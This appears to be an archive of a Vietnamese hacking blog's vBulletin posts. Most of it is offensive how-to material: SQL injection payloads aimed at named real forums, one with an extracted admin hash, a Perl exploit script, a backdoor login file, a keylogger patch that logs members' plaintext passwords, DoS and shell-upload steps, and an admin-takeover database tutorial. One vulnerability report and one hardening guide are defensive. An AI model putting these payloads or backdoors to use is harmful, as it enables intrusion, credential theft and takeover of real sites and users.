Hiển thị các bài đăng có nhãn vBulletin. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn vBulletin. Hiển thị tất cả bài đăng
26 thg 8, 2013
exploit vBulletin với Awards System 4.0.2+ SQL Injection
Tiếp tục exploit vBulletin với Awards System 4.0.2+ SQL Injectiondork thì sáng tạo ra nha
Ở đây mình dùng dork này nè : inurl:request_award.php Powered by vBulletin® Version 4.0.2
vào site victim với dạng victim.com/request_award.php
Khai thác bằng thêm data với cấu trúc như sau ,có thể dùng addon hackbar nha
do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
-->victim.com/request_award.php
Data:do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
Mình lấy ví dụ victim là trang ihabteens.com
kết hợp command và query nó
http://www.ihabteens.com/forums/request_award.php
Post :do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,sal t,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit
Sẽ hiện ra như sau ,hihi

View source nó và nhận đc là

--> Dino:ef1b59043951239f1d073772342f119a
login bằng cookie thôi :x Xem chi tiết »
Khai Thác Vbulletin [sql trên shoutbox]
2 bài trứoc viết về vbb,tiếp tục mình viết nốt mấy bug còn lại ,bài này là lỗi sql trên shoutboxdork khai thác :inurl:infernoshout.php
ra một số trang thêm vào đuôi victim tìm đc đoạn như sau
victim.com/folder/infernoshout.php?do=options&area=commands
Mình demo trên http://bien19.biz/forum/infernoshout...&area=commands
hiện ra như sau

Như thấy nó hiện ra 4 khung,khung đầu nhập vào đoạn query là
PHP Code:
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='# save setting,nó sẽ hiện ra trang thông báo

View source kéo xuống ta xem tên user và đoạn pass mã hóa nó,lấy đăng nhập bằng user admin bằng cookie thôi^^
Xem chi tiết »
17 thg 8, 2013
How To Hack vBulletin 4.1.10 Admin Control Panel
vBulletin 4.1.10 Vulnerability description:When a new name and password is entered in a form and the form is submitted, the browser
asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache.
.This vulnerability affects /admincp
.The impact of this vulnerability
.Possible sensitive information disclosure
Now I Will Tell You How To Hack Admin Cp
Mã:
vb_login_password
from form named loginform with
Mã:
action ../login.php?do=loginhas autocomplete enabled.
IN That Way You Could Do Sql Injection
Other Vulnerabilty Found Also
The HTML comments of this page contain configuration information for Microsoft Frontpage Server Extensions. The configuration information includes the Frontpage version and may help an attacker to learn more about his target.
This vulnerability affects
Mã:
/_vti_inf.html.To Attack It
example.com/admincp/_vti_inf.htmlOr Use That Way
Mã:
example.com/_vti_inf.htmlXem chi tiết »
19 thg 4, 2013
Bug SHOP Guny Cương Hóa Guny
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## ## Exploit Title: SHOP Guny Cương Hóa Guny #
# Google Dork: n/a #
# Date: 16/4/13 #
# Exploit Author: VnDragon - VHB #
# Code Mod: http://www.vietvbb.vn/up/showthread.php?t=67076 #
# Version: [2.0.1] #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #
Code:
Exploit: http://victim.com/tudo.php?tudo=matkieng&id=1' [SQL]
Exploit: http://victim.com/tudo.php?tudo=mat&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=ao&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=toc&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=non&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=trangsuc&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=canh&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=vukhi&id=1' [SQL]
PHP Code:
$id = $_GET['id']; Find
PHP Code:
$id = $_GET['id']; PHP Code:
$id = addslashes($_GET['id']); Demo: http://jrockhome.com/tudo.php?tudo=mat&id=1'
Note: Phải có items mới tiến hành exploit được. Xem chi tiết »
(Final 2.1) Hệ thống RPG PET
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## ## Exploit Title: (Final 2.1) Hệ thống RPG PET #
# Google Dork: n/a #
# Date: 15/4/13 #
# Exploit Author: VnDragon - VHB #
# Code Mod: http://www.vietvbb.vn/up/showthread.php?t=40921 #
# Version: [2.1] #
# Thank concobe #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #
Exploit: http://victim.com/rpg.php?do=battle&type=monster&id=-1' [SQL]
File: battle.php, Line: 11 and more fille.
Code:
PHP Code:
$idmon = $_GET['id']; Find
PHP Code:
$idmon = $_GET['id']; PHP Code:
$idmon = addslashes($_GET['id']); Demo: http://nguyenmy.net/forum/rpg.php?do...=monster&id=-1' Xem chi tiết »
Fun Shop mod Vbulletin SQL injection
Như đã hứa thì hôm nay mình sẽ cung cấp một cái bug của 1 mod cũng khá nhiều forum đang sử dụng bị dính lỗi SQL injection và có thể bị khai thác và chiếm quyền, dưới đây là thông tin lỗi:
Mod lỗi: Fun Shop
Author: http://www.vietvbb.vn/up/showthread.php?t=43945
version: All
Dork: inurl:/fshop.php?do=buy&id=
link lỗi: /fshop.php?do=buy&id=SQL Injection
Exploit by: concobe & bula -VHB- huynhdegroup.net
Điều kiện bắt buộc phải có là:
1. victim có cài mod Fun Shop
2. Attacker phải có tài khoản trên victim và đã login vào.
Query giả sử id=6: /fshop.php?do=buy&id=-6' union select 1,2,3,4,5,6,7,8,9,10-- -
cột lỗi gồm 5,6,7,8
lấy version() : /fshop.php?do=buy&id=-6' union select 1,2,3,4,version(),6,7,8,9,10-- -
xxx xxx xxx
Đến đây thì có lẽ mọi người hoàn toàn có thể làm những gì mình cần rồi. Mình không ghi ra luôn tất cả những câu query để lấy những thông tin quan trọng mục đích để mọi người tự query và làm phần còn lại để hiểu hơn những gì mình cần làm.
Một số server sẽ có chặn và lọc các truy vấn nguy hiểm nên mọi người có thể dùng thêm những cách bypass khi SQL injection thông thường là sẽ làm được.
Fix lỗi:
Do dạo này đang bận nên chưa đưa ra được bản fix lỗi cho mod này được. Bạn nào có thời gian và điều kiện giúp mình bổ xung phần fix lỗi mod này dùm.
Cuối cùng vui lòng để lại dòng này khi leech đi các nơi khác dùm:Exploit by: concobe & bula -VHB- huynhdegroup.net
---------- Post added at 08:54 PM ---------- Previous post was at 08:49 PM ----------
Live demo: http://teamhacker.us/forum/
sorry Tim Rơi Lệ Xem chi tiết »
vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection
vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection
# Exploit Title: vBulletin 5 Beta XX SQLi 0day# Google Dork: "Powered by vBulletin Version 5.0.0 Beta"Xem chi tiết »
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
| vBulletin 5 Beta XX SQLi 0day |
| Author: Orestis Kourides |
| Web Site: www.cyitsec.net |
+===================================================+
";
if (@ARGV != 5) {
print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
exit;
}
$host = $ARGV[0];
$path = $ARGV[1];
$username = $ARGV[2];
$password = $ARGV[3];
$magicnum = $ARGV[4];
$encpath = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
[
'url' => $encpath,
'username' => $username,
'password' => $password,
],
Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
],
User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;</pre>
<b> </b></div>
18 thg 4, 2013
Bug Topx vBB dễ hiểu cho NewBie - by KyoBin
Link Download:END TUT. TUT by KyoBin VHB ^^ Xem chi tiết »
4 thg 11, 2012
ChangUonDyU Advanced Statistics - SQL injection
[Juno_okyo's Blog] ChangUonDyU Advanced Statistics - SQL injection
25 thg 10, 2012
Nghịch ChangUonDyU Chatbox[ Dành cho Newbie]
_Lại chào bà con phát nữa,rảnh tiếp làm cái tut cho mấy ku nghịch ( chỉ dành cho mấy master gà ko config chatbox thôi nhá) pro lượn
[+] _Phần 1 ( config mặc định)
./_ Trước tiên lấy vic tim lên google tìm bừa được thằng Muonline forum.mu4viet.com lấy nó test luôn zô reg cái nick thấy có chát box là thích rồi
./_ http://forum.mu4viet.com/chatbox/ <- đây là chat box chưa được config và được đặt mặc định như sau
$config['check_domain_reffer'] = false; // <--- Không cho sử dụng domain #
$config['check_chatbox_key'] = false; // <-- Phải có key mới chát được trường hợp này là false với giá trị này thì ta vẫn có thể chát mà ko cần key ( mỗi 1 user có 1 key chát # nhau)
./_ Trong khi chát bật Http live lên để sniff
./_ Và ta có được đoạn code sau
Referer: http://forum.mu4viet.com/chatbox//index.php
?do=postshout
&key=ace24b6eb5855aa4124e5fe85a2a750c
&userid=1
&groupid=6
&username=%3Cfont%20color%3D%27red%27%3E%3Cb%3ETMT %3C%2Fb%3E%3C%2Ffont%3E
&message=%2Fprune
&color=Lime
&font=Arial
&font=
&bold=B*
&italic=I
&underline=U
./_ Với config như trên thì ta không cần dùng đến key vẫn chát có thể chát được , bây giờ ta cài đặt Localhost để bắt đầu nghịch nhé , ở đây mình cài xampp
./_ Để bắt đàu công đoạn thì ta view cái source của diễn đàn lên sẽ thấy như sau
./_ Ở cái đống mã nguồn này ta lợi dụng đoạn JavaScript cõ sẵn , mình ko hướng dẫn chi tiết chỉ cần lấy 1 số đoạn mã cần thiết phục vụ cho việc mình cần làm thôi
<html> <head> <script language="JavaScript" type="text/javascript"> } function fcb_setCookie(c_name,value) { var exdate=new Date(); exdate.setDate(exdate.getDate()+365); document.cookie=c_name+ "=" +escape(value)+ ";expires="+exdate.toGMTString() + "path=/"; } function fcb_getCookie(c_name) { if (document.cookie.length>0) { c_start=document.cookie.indexOf(c_name + "="); if (c_start!=-1) { c_start=c_start + c_name.length+1; c_end=document.cookie.indexOf(";",c_start); if (c_end==-1) c_end=document.cookie.length; return unescape(document.cookie.substring(c_start,c_end)) ; } else { return ""; } } } var path = 'http://forum.mu4viet.com/chatbox/'; var chatboxkey = 'ace24b6eb5855aa4124e5fe85a2a750c'; var huid = '1'; var hgroupid = '6'; var huser = "%3Cb%3E%3Cfont%20color%3Dred%3ETMT%3C%2Fb%3E%3C%2Ffont%3E"; function fcb_postshout()
{
hmess = document.fcb_form.hmess.value;
document.fcb_form.hmess.value = '';
if (hmess == '')
{
alert('Chưa nhập nội dung!');
}
else
{
fcb_frame.location = path + '/index.php?do=postshout&key=' + chatboxkey + '&userid=' + huid + '&groupid=' + hgroupid + '&username=' + huser + '&message=' + encodeURIComponent(hmess) + '&color=Lime&font=Arial&font=&bold=B*&italic=I&und erline=U';
}
}
/script>
</head>
<body bgcolor="#2c2c2c" text="#0F0">
<form name="fcb_form" method="post" action="javascript:fcb_postshout();">
<input id="hmess" type="text" name="hmess" style="width:94%;">
<input type="submit" value="Send">
</form>
<iframe name="fcb_frame" src="http://forum.mu4viet.com/chatbox/index.php" frameborder="0" style="width: 100%; height: 93%"></iframe>
</body>
</html>
./_ Save nó lại thành HTML và gõ thôi , change cái tên TMT thành tên Của bạn là ok
./_Bên ChátBox
./_Hết phần 1 với mức cơ bản ....Code juno_okyo chym teo
Nguồn http://www.tmt-today.com/2012/10/nghich-changuondyu-chatbox-danh-cho.html
Sẽ cố gắng tự viết ra tut chơi cho ae đọc
Xem chi tiết »
ChangUonDyU - Advanced Statistics SQL injection
010101010101010101010101010101010101010101010101010101010
1 VNHGROUP 0
0 H4cking - S3cure - Und3rGroup 0
010101010101010101010101010101010101010101010101010101010
#####################################################################################################
->Vulnerability
#####################################################################################################
->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum& listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,
user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://vietsource.net/forum/ajax.php?do=inforum& listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c, user(),version(),database()), 8,9,10,11 from user where userid=1-- -&result=20
http://tuoitredonganh.vn/diendan/ajax.php?do=inforum& listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c, user(),version(),database()), 8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager fake login
[+] Md5 Hash Generator ->http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno-okyo & all VNHgroup members
##########################################################################################
23 thg 10, 2012
[Report] ChangUonDyU Advanced Statistics - SQL injection
Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được
Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là
$_REQUEST['listforumid']
Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).
Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah
Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)
Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.
Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT
Bạn tìm đến dòng:
Trích dẫn
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);
Thay bằng:
Trích dẫn
$foruminid = intval($_REQUEST['listforumid']);
Report từ: DaiCa.Net - Forum newbie học hỏi
P/S by Juno_okyo:
Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính. Xem chi tiết »
16 thg 10, 2012
Cài Keylogger cho VBB
<b>Cái này sẽ ghi lại pass của mọi thành viên khi họ đăng nhập vào 1 file ta định sẵn
-edit file login.php
tìm:
Trích dẫn
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
thêm vào bên dưới:
Trích dẫn
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
// The log will be recorded in this file
$lg_file = “./modcp/test.html“;
$sql_query = @mysql_query(”SELECT * FROM ” . TABLE_PREFIX . “user WHERE username=’” . $lg_username . “‘”);
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, “a+”); @fwrite($fp1, $lg_username . ‘ : ‘ . $lg_password.” (” . $row["email"] . “)\n”);
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, “w”);
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
- Edit file global.php:
Tìm
Trích dẫn
$show['nopasswordempty'] = defined(’DISABLE_PASSWORD_CLEARING’) ? 1 : 0; // this nees to be an int for the templates
Thay bằng:
Trích dẫn
//$show['nopasswordempty'] = defined(’DISABLE_PASSWORD_CLEARING’) ? 1 : 0; // this nees to be an int for the templates
- Nếu gặp lỗi các bạn có thể vào file global.php tìm
Trích dẫn
eval(’$ad_location[\'ad_header_logo\'] = “‘ . fetch_template(’ad_header_logo’) . ‘”;’);
eval(’$ad_location[\'ad_header_end\'] = “‘ . fetch_template(’ad_header_end’) . ‘”;’);
eval(’$ad_location[\'ad_navbar_below\'] = “‘ . fetch_template(’ad_navbar_below’) . ‘”;’);
eval(’$ad_location[\'ad_footer_start\'] = “‘ . fetch_template(’ad_footer_start’) . ‘”;’);
eval(’$ad_location[\'ad_footer_end\'] = “‘ . fetch_template(’ad_footer_end’) . ‘”;’);
Và thay thể bằng
Trích dẫn
//eval(’$ad_location[\'ad_header_logo\'] = “‘ . fetch_template(’ad_header_logo’) . ‘”;’);
//eval(’$ad_location[\'ad_header_end\'] = “‘ . fetch_template(’ad_header_end’) . ‘”;’);
//eval(’$ad_location[\'ad_navbar_below\'] = “‘ . fetch_template(’ad_navbar_below’) . ‘”;’);
//eval(’$ad_location[\'ad_footer_start\'] = “‘ . fetch_template(’ad_footer_start’) . ‘”;’);
//eval(’$ad_location[\'ad_footer_end\'] = “‘ . fetch_template(’ad_footer_end’) . ‘”;’);
File chứa Password sẽ được lưu ở đây:
/modcp/test.htm
Nguồn:http://phongdatgl.biz/blog/read.php?88#ixzz29N4xZTpP</b>
Xem chi tiết »
12 thg 8, 2012
Fakelogin - Đăng nhập vào forum VBB không cần pass
Fakelogin - Đăng nhập vào forum VBB không cần passCode này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass
Sau đây là code
if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
?>
Copy đoạn code trên vào notepad save đuôi *.phpXem chi tiết »
Upload vào thư mục chứa forum ngang hàng với file index.php
Sau đó chạy link sau
http://domain.com/forum/*.php?bd=username
VBulletin DoS Exploit (all versions)
VBulletin DoS Exploit (all versions):Code Perl : http://www.mediafire.com/?ijjqbl4bl45h3lq
Setup activeperl:
http://www.activestate.com/activeperl
Mặc định là ổ C:/Perl
WinDown + R -> cmd
ta đến ổ C
cd C:\Perl
run câu lệnh sau
kma.pl victim.com /path/
ex:
kma.pl victim.com /forum/
Khắc Phục :
+ Trỏ Lại Dns
+ Nếu là chủ server thì ko cho ping ,vì nếu ping đc thì còn gửi gói tin và trã về gói tin đó > over load cpu Xem chi tiết »
[Video - TUT] Up Shell Via Database Vbb (cPanel X)
[Video - TUT] Up Shell Via Database Vbb (cPanel X)File.Sql
http://www.mediafire.com/?8rings08z55f8s6
Tut
http://www.mediafire.com/?5f14jr2x7hzwb54
Tool
http://www.mediafire.com/?0jlagu7zcgbvjcb
-------------------------------------
Drop 2 table:
DROP TABLE `datastore`,`plugin`;
Sau đó import 2 file.sql vào
chạy link
http://victim.com/search.php Xem chi tiết »
vbulletin hash Cracker (đoán pass loạn cào cào)
vbulletin hash Cracker (đoán pass loạn cào cào)Tut + vb_cracker.php :
http://www.mediafire.com/?89wc4jwk8u2xpjj
Ta setup 1 forum
Chỉnh sữa file vb_cracker.php có thông tin info database như trong config.php forum vừa tạo
$mysql[username] = 'xxx';
$mysql[password] = 'yyy';
$mysql[database] = 'zzz';
tạo file : mil-dic.txt cùng chung thư mục với vb_cracker.php
để các password ta đoán vào file này ( mổi pass 1 dòng)
Edit các password và hash vừa chôm được vào user của database
http://../vb_cracker.php để đoán pass loạn cào cào Xem chi tiết »
5 thg 8, 2012
Security Guidelines - Hướng Dẫn Bảo Mật Cho vBulletin
+ ) Trong Hướng Dẫn Này Mình sẽ đề Cập tới phương pháp Chmod cho thư mục với Cpanel , Giấu File Config.php bằng phương pháp Hã Móa file , Đổi tên thư mục admincp , modcp . . . .
Xem chi tiết »
phương pháp làm :
- mở file config.php trong thư mục includes
tìm dòng :
PHP Code:$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';
admincp đổi thành tên thư mục mới cho admincp ( vd: admincp --> quanlydiendan)
modcp đổi thành tên thư mục mới cho modcp (vd: quanlychomod)
tiếp theo đổi tên thư mục admincp thành tên bạn vừa đổi ở trong file config.php
( làm tương tự với modcp )
Vẫn tại file config.php
tìm dòng :
PHP Code:$config['SpecialUsers']['undeletableusers'] = 'Ních của Admin trong database';
giải thích : là một phương pháp thiết lập ở config.php để ngăn chặn việc xóa, sửa hay thêm bớt thông tin tài khoản admin
- vào thư mục gốc của diễn đàn tạo một thư mục có tên đầu tiên bắt đầu bằng # ( vd : #baomat ) trong file này bạn để file config.php
bạn xóa toàn bộ dữ liệu trong file config.php này rồi ghi code sau:
PHP Code:<?php include "#data/usercp.php" ?>
#data/usercp.php
bạn ghi file config.php thật của mình , mình khuyên các bạn nên đặt file config.php thật ở trong thư mục admincp hoặc
modcp nhớ là phải tạo thư mục có tên bắt đầu bằng # !
đổi tên cofig.php thật với những tên tương tự gần giống với các file ( ví dụ : config.php đổi tên thật thành usercp.php )
- tại file config.php bạn download về rồi sử dụng công cụ mã hóa file Zend ,
( tốt hơn bạn chỉ mã hóa file config.php có code )
PHP Code:<?php include "#data/usercp.php" ?>
sau khi mã hóa xong bạn lại upload file config.php lên
( để đảm bảo an toàn hơn khi hacker có gắng đọc file class_core.php ta viết thêm .htaccess vào với code như sau )
và chmod cho nó 444
PHP Code:<Files "class_core.php">Order Allow,DenyDeny from All</Files>
- mở thư mục includes và tim file class_core.php
tìm code :
PHP Code:include(CWD . '/includes/config.php');
if (file_exists(CWD. '/includes/config.php'))
die('<br /><br /><strong>Configuration</strong>: includes/config.php exists,
die('<br /><br /><strong>Configuration</strong>: includes/config.php does not exist.
includes/config.php
tại đây bạn ghi file config.php
có code :
PHP Code:<?php include "[COLOR="#data/usercp.php" ?>
- chmod cho toàn bộ với những file và thư mục đã thực hiện ở trên
config.php chmod thành 400
class_core.php chmod thành 400
usercp.php chmod thành 400 ( file config.php thật )
chmod cho thư mục có chứa những file vừa thực hiện thành 100 ( ví dụ : includes )
-Phương pháp chống những kẻ tò mò tọc mạch
Bạn tạo một file index.html với nội dung tùy ý ở bất cứ folder nào trong host. (kể cả mục skin, imager, và những folder con trong folder , imager ..)
- Che dấu những folder nhạy cảm.
- Bạn có thể dùng .htaccess.
- Rename các folder nhạy cảm như data, databackup, mysqldumper...
- Tạo subdomain để vào VD: sql.yourdomain.com và trỏ tới mysqldumper
- cách phát hiện quá trình xâm nhập
-Để làm được bạn lần lượt làm theo hướng dẫn ở các bước sau :
Bước 1: edit file login.php ( nó nằng ngang hàng với admincp , index.php )
Bạn tìm:
PHP Code:$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);
Và add sau nó:
PHP Code:$username = $vbulletin->GPC['vb_login_username']; $fdate = date('l, F jS, Y'); $ftime = date('g:i:s a'); $fdatetime = "Date/Time: $fdate at $ftime \r\n"; $fscriptpath = "Script: http://$_SERVER[HTTP_HOST]" . SCRIPTPATH . "\r\n"; $freferer = 'Referrer: ' . REFERRER . "\r\n"; $fusername = "Username tried: $username \r\n"; $fipaddress = 'IP Address: ' . IPADDRESS . "\r\n"; $iphostname = "Host: " . @gethostbyaddr(IPADDRESS) . "\r\n"; if ($vbulletin->userinfo['userid'] > 0) { $realname = "\nUSER ATTEMPT: " . $vbulletin->options['bbtitle'] . " has identified this registered user as: " . $vbulletin->userinfo['username'] . "\r\n"; }
Bước 2: vẫn ở file login.php
Bạn tìm:
PHP Code:// log this error if attempting to access the control panel require_once (DIR . '/includes/functions_log_error.php');
Thêm sau nó:
PHP Code:$fstrk = "Strikes: $GLOBALS[strikes] out of 5 \r\n"; if ($vbulletin->GPC['logintype'] === 'cplogin') { $subject= 'WARNING: Failed Admin CP logon in ' . $vbulletin->db->appname . ' ' . $vbulletin->options['templateversion'] . "\r\n\r\n"; $message="Someone is trying to login to your " . $vbulletin->options['bbtitle'] . " Admin CP!\n\n$fusername$fipaddress$iphostname$fstrk$fref erer$fscriptpath$fdatetime$realname"; } else { $subject= 'WARNING: Failed Mod CP logon in ' . $vbulletin->db->appname . ' ' . $vbulletin->options['templateversion'] . "\r\n\r\n"; $message="Someone is trying to login to your " . $vbulletin->options['bbtitle'] . " Mod CP!\n\n$fusername$fipaddress$iphostname$fstrk$fref erer$fscriptpath$fdatetime$realname"; } vbmail($vbulletin->options['webmasteremail'], $subject, $message, true);
webmasteremail các bạn chỉnh trongvb options nhé code sẽ tự động gởi mail thông báo quá trình xâm nhập cho bạn.
+ ) Phương pháp chống up shell wa plugin và edit plugin
Bạn chèn đoạn code này vào file config.php (sau dòng <?php)
PHP Code:define('DISABLE_HOOKS', true);
một số bạn quyên không xóa file validator.php đi nên bị lộ thông tin việc này chúng ta cũng nên chú ý nha !
Chú ý : phương pháp trên áp dụng cho Cpanel không áp dụng cho window .
4 thg 8, 2012
Tut hướng dẫn chiếm quyền admin VBB trong data
cách 1: change pass admin trong datacách 2: change adminpermissions
cách 3: forget pass admin
Yêu cầu:
Có được info data của victim bao gồm:
Code:
$config['Database']['dbname'] = 'forum';$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = '123456';
Đầu tiên ta tôi sẽ nói cho các bạn biết về các dạng mã hóa của một vài forum thông dụng hiện nay như:
Code:
1. phpBB : md5($pass) //ko dùng salt2. VBB : md5(md5($pass).$salt)
3. IPB : md5(md5($salt).md5($pass))
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).
OK băt đầu thôi:
Cách 1: change pass admin trong data
Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Code:
Select * from user Nếu 4rum victim có số lượng thành viện cở hơn 3k thì ta dung lệnh
Code:
Select password , salt from user where username='hacker' Code:
Pass md5 : 5cc70df698ca01c3adb396a08b4873adSalt: ?`Y
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.
Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.
Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong 4rum victim có nhiều admin ma ta ko bít admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A:Bay vào file config.php và tìm các dòng sau
Code:
$config['SpecialUsers']['canviewadminlog']$config['SpecialUsers']['canpruneadminlog']
$config['SpecialUsers']['superadministrators']
Ta tiếp tục dùung lệnh
Code:
Select password , salt from user where userid=1 Vi dụ:
Code:
Pass md5 : eaf1672523371b7736282bbfc2c8b2acSalt : 2/D
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google
Code:
Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin” Code:
Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1” ?`Y là salt của nick hacker
1 là userid của thằng admin
Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào 4rum victim đăng nhập bằng nick của thằng admin với password là 123456
Cách 2: Thay phân quyền trong table administrator
ở cách 2 thì không dài và rồm rà như cách 1 .Ta cũng connet vào data victim
dùng lệnh
Code:
update user set usergroupid =’6’ where username=’hacker’ với câu lệnh này nick hacker mới chỉ là admin bình thường … vẫn chưa có toàn quyền trên site victim .
ta tiếp tực dung lệnh
Code:
select * from administrator ở đây lại chia ra thêm 2 cách nhỏ:
2.a) Dùng lệnh update
Code:
